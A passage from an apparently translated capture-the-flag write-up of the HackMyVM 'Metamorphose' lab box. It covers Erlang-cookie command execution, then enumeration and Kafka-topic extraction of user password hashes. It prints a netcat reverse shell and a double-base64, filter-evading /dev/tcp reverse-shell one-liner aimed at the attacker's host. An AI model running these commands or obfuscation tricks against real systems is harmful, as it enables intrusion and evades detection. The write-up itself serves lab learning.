-vvv -XX -nn     \ntcpdump: listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n.........\n11:21:13.819722 IP (tos 0x0, ttl 64, id 32961, offset 0, flags [DF], proto TCP (6), length 93)\n    172.20.10.3.40121 &gt; 172.20.10.8.44550: Flags [P.], cksum 0xd59c (correct), seq 6:47, ack 32, win 509, options [nop,nop,TS val 3619497937 ecr 1177140916], length 41\n        0x0000:  0800 27fb 51ff 0800 27df cd6e 0800 4500  ..&#039;.Q...&#039;..n..E.\n        0x0010:  005d 80c1 4000 4006 4da6 ac14 0a03 ac14  .]..@.@.M.......\n        0x0020:  0a08 9cb9 ae06 31a1 1561 ceb8 3709 8018  ......1..a..7...\n        0x0030:  01fd d59c 0000 0101 080a d7bd 27d1 4629  ............&#039;.F)\n        0x0040:  beb4 0027 4e00 0000 0d07 df7f bd9d f8eb  ...&#039;N...........\n        0x0050:  b666 b0d3 1f00 146e 6574 776f 726b 406d  .f.....network@m\n        0x0060:  6574 616d 6f72 7068 6f73 65              etamorphose\n...............\n11:21:13.832587 IP (tos 0x0, ttl 64, id 32963, offset 0, flags [DF], proto TCP (6), length 178)\n    172.20.10.3.40121 &gt; 172.20.10.8.44550: Flags [P.], cksum 0xf79a (correct), seq 66:192, ack 161, win 509, options [nop,nop,TS val 3619497950 ecr 1177140919], length 126\n        0x0000:  0800 27fb 51ff 0800 27df cd6e 0800 4500  ..&#039;.Q...&#039;..n..E.\n        0x0010:  00b2 80c3 4000 4006 4d4f ac14 0a03 ac14  ....@.@.MO......\n        0x0020:  0a08 9cb9 ae06 31a1 159d ceb8 378a 8018  ......1.....7...\n        0x0030:  01fd f79a 0000 0101 080a d7bd 27de 4629  ............&#039;.F)\n        0x0040:  beb7 0000 007a 7083 6803 6102 7700 5877  .....zp.h.a.w.Xw\n        0x0050:  0e56 5155 4654 4a40 6e6f 7768 6572 6500  .VQUFTJ@nowhere.\n        0x0060:  0000 0300 0000 0000 0000 0083 6802 7703  ............h.w.\n        0x0070:  7265 786b 004a 7569 643d 3130 3030 286d  rexk.Juid=1000(m\n        0x0080:  656c 626f 7572 6e65 2920 6769 643d 3130  elbourne).gid=10\n        0x0090:  3030 286d 656c 626f 7572 6e65 2920 6772  00(melbourne).gr\n   
     0x00a0:  6f75 7073 3d31 3030 3028 6d65 6c62 6f75  oups=1000(melbou\n        0x00b0:  726e 6529 2c31 3030 2875 7365 7273 290a  rne),100(users).<\/code><\/pre>\n<p>Packets are flowing and replies come back, so try spawning a reverse shell.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py 172.20.10.3 40121 batman &#039;nc -e \/bin\/bash 172.20.10.8 1234&#039;\n[*] authenticated onto victim<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058523.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058523.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805232810783\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Here <a href=\"https:\/\/www.youtube.com\/@thePL4GU3\">PL4GU3<\/a> saved himself some trouble by simply double-<code>base64<\/code>-encoding the payload, a neat trick worth learning. Let's try it:<\/p>\n<pre><code class=\"language-bash\"># bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;&amp;1\n# YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4yMC4xMC44LzEyMzQgPCYx\n# WW1GemFDQXRhU0FtUGk5a1pYWXZkR053THpFM01pNHlNQzR4TUM0NEx6RXlNelFnUENZeA==\n# 
echo${IFS}WW1GemFDQXRhU0FtUGk5a1pYWXZkR053THpFM01pNHlNQzR4TUM0NEx6RXlNelFnUENZeA==|ba&#039;&#039;se&#039;&#039;6&#039;&#039;4${IFS}-&#039;&#039;d|ba&#039;&#039;se&#039;&#039;64${IFS}-&#039;&#039;d|b&#039;&#039;a&#039;&#039;s&#039;&#039;h\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py 172.20.10.3 40121 batman                                   \n[*] authenticated onto victim\n172.20.10.3:40121 $ echo${IFS}WW1GemFDQXRhU0FtUGk5a1pYWXZkR053THpFM01pNHlNQzR4TUM0NEx6RXlNelFnUENZeA==|ba&#039;&#039;se&#039;&#039;6&#039;&#039;4${IFS}-&#039;&#039;d|ba&#039;&#039;se&#039;&#039;64${IFS}-&#039;&#039;d|b&#039;&#039;a&#039;&#039;s&#039;&#039;h<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058524.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058524.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805233704132\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/$ whoami;id\nmelbourne\nuid=1000(melbourne) gid=1000(melbourne) groups=1000(melbourne),100(users)\n(remote) melbourne@metamorphose.hmv:\/$ cd ~\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ ls -la\ntotal 28\ndrwx------ 3 melbourne melbourne 4096 Feb 26 17:32 .\ndrwxr-xr-x 4 root      root      4096 Feb 26 17:14 ..\nlrwxrwxrwx 1 root      root         9 Feb 
26 17:32 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 melbourne melbourne  220 Feb 26 17:14 .bash_logout\n-rw-r--r-- 1 melbourne melbourne 3526 Feb 26 17:14 .bashrc\n-rw------- 1 melbourne melbourne    7 Feb 26 17:15 .erlang.cookie\ndrwxr-xr-x 3 melbourne melbourne 4096 Mar  2 18:23 .local\n-rw-r--r-- 1 melbourne melbourne  807 Feb 26 17:14 .profile\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ cd .local\/\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne\/.local$ ls -la\ntotal 16\ndrwxr-xr-x 3 melbourne melbourne 4096 Mar  2 18:23 .\ndrwx------ 3 melbourne melbourne 4096 Feb 26 17:32 ..\n-rwxr-xr-x 1 melbourne melbourne  102 Feb 26 17:15 erlang\ndrwx------ 3 melbourne melbourne 4096 Feb 26 17:15 share\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne\/.local$ cat erlang \n#!\/bin\/bash\n\nsleep 4\n\n\/usr\/bin\/erl -sname network@metamorphose -noinput -eval &quot;timer:sleep(infinity)&quot;\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne\/.local$ cd ..\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ cat .erlang.cookie \nbatman\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ sudo -l\nbash: sudo: command not found\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ cd \/\n(remote) melbourne@metamorphose.hmv:\/$ ls -la\ntotal 8488\ndrwxr-xr-x  18 root root  266240 May 28 11:22 .\ndrwxr-xr-x  18 root root  266240 May 28 11:22 
..\nlrwxrwxrwx   1 root root       7 Feb 26 09:57 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root    4096 May 28 11:23 boot\ndrwxr-xr-x  17 root root    3320 Aug  5 15:26 dev\ndrwxr-xr-x  95 root root    4096 Aug  5 15:26 etc\ndrwxr-xr-x   4 root root    4096 Feb 26 17:14 home\nlrwxrwxrwx   1 root root      30 May 28 11:22 initrd.img -&gt; boot\/initrd.img-6.1.0-21-amd64\nlrwxrwxrwx   1 root root      30 Feb 26 09:58 initrd.img.old -&gt; boot\/initrd.img-6.1.0-18-amd64\nlrwxrwxrwx   1 root root       7 Feb 26 09:57 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root       9 Feb 26 09:57 lib64 -&gt; usr\/lib64\ndrwx------   2 root root   16384 Feb 26 09:57 lost+found\ndrwxr-xr-x   3 root root    4096 Feb 26 09:57 media\ndrwxr-xr-x   2 root root    4096 Feb 26 09:57 mnt\ndrwxr-xr-x   3 root root    4096 Feb 26 16:50 opt\ndr-xr-xr-x 139 root root       0 Aug  5 15:26 proc\ndrwx------   4 root root    4096 Mar  3 14:05 root\ndrwxr-xr-x  17 root root     500 Aug  5 15:26 run\nlrwxrwxrwx   1 root root       8 Feb 26 09:57 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root    4096 Feb 26 09:57 srv\ndr-xr-xr-x  13 root root       0 Aug  5 15:26 sys\ndrwxrwxrwt   8 root root 8089600 Aug  5 15:31 tmp\ndrwxr-xr-x  12 root root    4096 Feb 26 09:57 usr\ndrwxr-xr-x  11 root root    4096 Feb 26 09:57 var\nlrwxrwxrwx   1 root root      27 May 28 11:22 vmlinuz -&gt; boot\/vmlinuz-6.1.0-21-amd64\nlrwxrwxrwx   1 root root      27 Feb 26 09:58 vmlinuz.old -&gt; boot\/vmlinuz-6.1.0-18-amd64\n(remote) melbourne@metamorphose.hmv:\/$ cd opt\n(remote) melbourne@metamorphose.hmv:\/opt$ ls -la\ntotal 272\ndrwxr-xr-x  3 root root   4096 Feb 26 16:50 .\ndrwxr-xr-x 18 root root 266240 May 28 11:22 ..\ndrwxrwxr-x  8 root root   4096 Feb 26 16:59 kafka\n(remote) melbourne@metamorphose.hmv:\/opt$ cd kafka\/\n(remote) melbourne@metamorphose.hmv:\/opt\/kafka$ ls -la\ntotal 268\ndrwxrwxr-x 8 root root   4096 Feb 26 16:59 .\ndrwxr-xr-x 3 root root   4096 Feb 26 16:50 ..\ndrwxrwxr-x 3 root root   4096 Feb 17 10:09 
bin\ndrwxrwxr-x 3 root root   4096 Feb 25 13:24 config\n-rw-r--r-- 1 root root 176919 Aug  5 15:27 kafka.log\ndrwxrwxr-x 2 root root  12288 Feb 14 19:45 libs\n-rwxrwxr-x 1 root root  15030 Nov 24  2023 LICENSE\ndrwxrwxr-x 2 root root   4096 Nov 24  2023 licenses\ndrwxrwxr-x 4 root root  12288 Aug  5 17:02 logs\n-rwxrwxr-x 1 root root  28184 Nov 24  2023 NOTICE\ndrwxrwxr-x 2 root root   4096 Nov 24  2023 site-docs<\/code><\/pre>\n<h3>Extracting the relevant information<\/h3>\n<p>Following this box author's usual pattern (things get dropped in <code>opt<\/code>), try extracting some information from there:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058525.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058525.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805234930821\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058526.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058526.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805235206219\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058527.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058527.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805235825887\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/opt\/kafka\/bin$ .\/kafka-console-consumer.sh --bootstrap-server broker:9092 --from-beginning --property print.key=true --property key.separator=&quot;-&quot;\nExactly one of --include\/--topic is required. ()\nOption                                   Description                            \n------                                   -----------                            \n--bootstrap-server &lt;String: server to    REQUIRED: The server(s) to connect to. \n  connect to&gt;                                                                   \n--consumer-property &lt;String:             A mechanism to pass user-defined       \n  consumer_prop&gt;                           properties in the form key=value to  \n                                           the consumer.                        \n--consumer.config &lt;String: config file&gt;  Consumer config properties file. 
Note  \n                                           that [consumer-property] takes       \n                                           precedence over this config.         \n--enable-systest-events                  Log lifecycle events of the consumer   \n                                           in addition to logging consumed      \n                                           messages. (This is specific for      \n                                           system tests.)                       \n--formatter &lt;String: class&gt;              The name of a class to use for         \n                                           formatting kafka messages for        \n                                           display. (default: kafka.tools.      \n                                           DefaultMessageFormatter)             \n--formatter-config &lt;String: config       Config properties file to initialize   \n  file&gt;                                    the message formatter. Note that     \n                                           [property] takes precedence over     \n                                           this config.                         \n--from-beginning                         If the consumer does not already have  \n                                           an established offset to consume     \n                                           from, start with the earliest        \n                                           message present in the log rather    \n                                           than the latest message.             \n--group &lt;String: consumer group id&gt;      The consumer group id of the consumer. \n--help                                   Print usage information.               \n--include &lt;String: Java regex (String)&gt;  Regular expression specifying list of  \n                                           topics to include for consumption.   
\n--isolation-level &lt;String&gt;               Set to read_committed in order to      \n                                           filter out transactional messages    \n                                           which are not committed. Set to      \n                                           read_uncommitted to read all         \n                                           messages. (default: read_uncommitted)\n--key-deserializer &lt;String:                                                     \n  deserializer for key&gt;                                                         \n--max-messages &lt;Integer: num_messages&gt;   The maximum number of messages to      \n                                           consume before exiting. If not set,  \n                                           consumption is continual.            \n--offset &lt;String: consume offset&gt;        The offset to consume from (a non-     \n                                           negative number), or &#039;earliest&#039;      \n                                           which means from beginning, or       \n                                           &#039;latest&#039; which means from end        \n                                           (default: latest)                    \n--partition &lt;Integer: partition&gt;         The partition to consume from.         \n                                           Consumption starts from the end of   \n                                           the partition unless &#039;--offset&#039; is   \n                                           specified.                           \n--property &lt;String: prop&gt;                The properties to initialize the       \n                                           message formatter. 
Default           \n                                           properties include:                  \n                                          print.timestamp=true|false            \n                                          print.key=true|false                  \n                                          print.offset=true|false               \n                                          print.partition=true|false            \n                                          print.headers=true|false              \n                                          print.value=true|false                \n                                          key.separator=&lt;key.separator&gt;         \n                                          line.separator=&lt;line.separator&gt;       \n                                          headers.separator=&lt;line.separator&gt;    \n                                          null.literal=&lt;null.literal&gt;           \n                                          key.deserializer=&lt;key.deserializer&gt;   \n                                          value.deserializer=&lt;value.            \n                                           deserializer&gt;                        \n                                          header.deserializer=&lt;header.          \n                                           deserializer&gt;                        \n                                         Users can also pass in customized      \n                                           properties for their formatter; more \n                                           specifically, users can pass in      \n                                           properties keyed with &#039;key.          \n                                           deserializer.&#039;, &#039;value.              \n                                           deserializer.&#039; and &#039;headers.         
\n                                           deserializer.&#039; prefixes to configure \n                                           their deserializers.                 \n--skip-message-on-error                  If there is an error when processing a \n                                           message, skip it instead of halt.    \n--timeout-ms &lt;Integer: timeout_ms&gt;       If specified, exit if no message is    \n                                           available for consumption for the    \n                                           specified interval.                  \n--topic &lt;String: topic&gt;                  The topic to consume on.               \n--value-deserializer &lt;String:                                                   \n  deserializer for values&gt;                                                      \n--version                                Display Kafka version.                 \n--whitelist &lt;String: Java regex          DEPRECATED, use --include instead;     \n  (String)&gt;                                ignored if --include specified.      
\n                                           Regular expression specifying list   \n                                           of topics to include for consumption.<\/code><\/pre>\n<p>The consumer complains that a topic is missing, so go and find one: <a href=\"https:\/\/www.cnblogs.com\/AcAc-t\/p\/kafka_topic_consumer_group_command.html\">https:\/\/www.cnblogs.com\/AcAc-t\/p\/kafka_topic_consumer_group_command.html<\/a><\/p>\n<pre><code class=\"language-shell\"># List the Kafka topics with the --list option\nbin\/kafka-topics.sh --zookeeper 127.0.0.1:2181 --list\n__consumer_offsets\nlx_test_topic\ntest\n\n# Show the details of a specific topic with --topic and --describe\nbin\/kafka-topics.sh --zookeeper 127.0.0.1:2181 --topic lx_test_topic --describe\nTopic:lx_test_topic     PartitionCount:1        ReplicationFactor:1     Configs:\nTopic: lx_test_topic    Partition: 0    Leader: 0       Replicas: 0     Isr: 0\n\n# List the consumer groups with --list\n# This command has a new and an old form: the new one lists consumers whose state is stored in the broker, the old one lists consumers whose state is stored in ZooKeeper, so pass --bootstrap-server or --zookeeper accordingly:\nbin\/kafka-consumer-groups.sh --new-consumer --bootstrap-server 127.0.0.1:9292 --list\nlx_test\n\nbin\/kafka-consumer-groups.sh --zookeeper 127.0.0.1:2181 --list\nconsole-consumer-86845\nconsole-consumer-11967\n\n# Show the details of a specific consumer group with --group and --describe\n# Again, pass --bootstrap-server or --zookeeper depending on whether the consumer is new- or old-style:\nbin\/kafka-consumer-groups.sh --new-consumer 
--bootstrap-server 127.0.0.1:9292 --group lx_test --describe\nGROUP                          TOPIC                          PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             OWNER\nlx_test                        lx_test_topic             0          465             465             0               kafka-python-1.3.1_\/127.0.0.1\n\nbin\/kafka-consumer-groups.sh --zookeeper 127.0.0.1:2181 --group console-consumer-11967 --describe\nGROUP                          TOPIC                          PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             OWNER\nCould not fetch offset from zookeeper for group console-consumer-11967 partition [lx_test_topic,0] due to missing offset data in zookeeper.\nconsole-consumer-11967         lx_test_topic             0          unknown         465             unknown         console-consumer-11967_aws-lx-1513787888172-d3a91f05-0<\/code><\/pre>\n<p>Try the commands the way <a href=\"https:\/\/home.cnblogs.com\/u\/AcAc-t\/\">\u53ca\u65f6<\/a> writes them in that article:<\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/opt\/kafka\/bin$ .\/kafka-topics.sh --bootstrap-server 127.0.0.1:9092 --list\n__consumer_offsets\ninternal_logs\nuser_feedback\nusers.properties<\/code><\/pre>\n<p>That gives the topic names; now read the messages out of the interesting one:<\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/opt\/kafka\/bin$ .\/kafka-console-consumer.sh --topic users.properties --bootstrap-server localhost:9092 --from-beginning --property print.key=true --property key.separator=&quot;-&quot;\nnull-{&quot;username&quot;: &quot;root&quot;, &quot;password&quot;: &quot;e2f7a3617512ed81aa68c7be9c435609cfb513b021ce07ee9d2759f08f4d9054&quot;, &quot;email&quot;: &quot;root@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;saman&quot;, &quot;password&quot;: 
&quot;5b5ba511537a7871212f7a978f708aef60a02b80e77ed14dcc59cbd019d6791d&quot;, &quot;email&quot;: &quot;saman@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;michele&quot;, &quot;password&quot;: &quot;77e19ed98cf4b945e9034efb30779abd21c70a7b4e3b0ae92ab50db9ca39a75b&quot;, &quot;email&quot;: &quot;michele@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;oleesa&quot;, &quot;password&quot;: &quot;f44609c0c1fe331267c8fe1069f4b67fd67ff95fb9742eede4ec9028fa770bdd&quot;, &quot;email&quot;: &quot;oleesa@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;sarene&quot;, &quot;password&quot;: &quot;2f15dacafe7b70bfa88d07d15026cdd40799264c36c120e34a28e7659b6a928d&quot;, &quot;email&quot;: &quot;sarene@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;janella&quot;, &quot;password&quot;: &quot;bc5219396bb2a0de2e0776ad1078f67c417da95d5e009989d7d4ea14823bfb5a&quot;, &quot;email&quot;: &quot;janella@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;bronson&quot;, &quot;password&quot;: &quot;a0ef680b09d2f9821d69416d6c5629d3f109751c0fc3a77592041644e268a65e&quot;, &quot;email&quot;: &quot;bronson@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;vonda&quot;, &quot;password&quot;: &quot;b1d83b7991c7a2286abfc2ba555e426a4dd7db4072815f71e3ec45406ab8dd7d&quot;, &quot;email&quot;: &quot;vonda@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;toshinari&quot;, &quot;password&quot;: &quot;5018f7be54a3f684bb01b2d21e293a423f5978da36e19c86abc085d9514b56d2&quot;, &quot;email&quot;: &quot;toshinari@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;laurie&quot;, &quot;password&quot;: 
&quot;597f3fdd0ba9d4af8699dc30e4d1c8c74551e10a56eaad108d34b28ac8d353c7&quot;, &quot;email&quot;: &quot;laurie@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;alia&quot;, &quot;password&quot;: &quot;d2e5eda5bf734608f1585adffc30846340878e0ab1f0be572ac79f88ac4c808e&quot;, &quot;email&quot;: &quot;alia@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;raj&quot;, &quot;password&quot;: &quot;3a76752b3c949f0bdaed819d0f61ae6ca863e5235062a004b23e65059cae6fdd&quot;, &quot;email&quot;: &quot;raj@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;arleen&quot;, &quot;password&quot;: &quot;aaf6946a8e02f31cc9542a0bb1cfa6dd49ccd01d57802417a28cf493ad7ff5ad&quot;, &quot;email&quot;: &quot;arleen@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;melbourne&quot;, &quot;password&quot;: &quot;a08aa555a5e5b7a73125cf367176ce446eb1d0c07a068077ab4f740a8fded545&quot;, &quot;email&quot;: &quot;melbourne@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;carolyn&quot;, &quot;password&quot;: &quot;544c4de6388bf397d905015b085ee359f3813550912467bed347e666d35a1fee&quot;, &quot;email&quot;: &quot;carolyn@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;coralie&quot;, &quot;password&quot;: &quot;9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e&quot;, &quot;email&quot;: &quot;coralie@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;farhad&quot;, &quot;password&quot;: &quot;157e2743e9edc74a954fc6cfa82f77801b66781091955cf0284f0e3819d51dfc&quot;, &quot;email&quot;: &quot;farhad@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;felix&quot;, &quot;password&quot;: 
&quot;3fe0e7fbd33d9ca82f77d1a0c2ff4c28b0d35b8024c61a05bd244ccc28d53816&quot;, &quot;email&quot;: &quot;felix@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;chase&quot;, &quot;password&quot;: &quot;e387178e3c60967aadc8e8a795a819d24493c05e2d999e56bf01d08654ef80d2&quot;, &quot;email&quot;: &quot;chase@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;blakeley&quot;, &quot;password&quot;: &quot;7cd774b3d7a0d7e8696b0cab072c0cc50dd7ab2ac3db362ebe2cd154a3505b78&quot;, &quot;email&quot;: &quot;blakeley@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;risa&quot;, &quot;password&quot;: &quot;9dee3c618985708c50c53854751297a10abc8b02e9f416137816fc408145a6b3&quot;, &quot;email&quot;: &quot;risa@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;paddy&quot;, &quot;password&quot;: &quot;d24214a379e0a1115185de1415c0c38f9a90803f1188fb366506eb96b219b838&quot;, &quot;email&quot;: &quot;paddy@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;min&quot;, &quot;password&quot;: &quot;c84ef95012d8f8baa4d62b1ea791c158a5daa7f82f611b2b33d344cb14779ceb&quot;, &quot;email&quot;: &quot;min@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;ezmeralda&quot;, &quot;password&quot;: &quot;362d8c0d990e1f8583047fbb0114691e2716a0f11d751ce29604611a7e38275d&quot;, &quot;email&quot;: &quot;ezmeralda@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;lita&quot;, &quot;password&quot;: &quot;dd3e6e2665d0f27ecce3a7e017c4d7656ad8e5a78d9d40d21bc044cf96097d66&quot;, &quot;email&quot;: &quot;lita@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;angeline&quot;, &quot;password&quot;: 
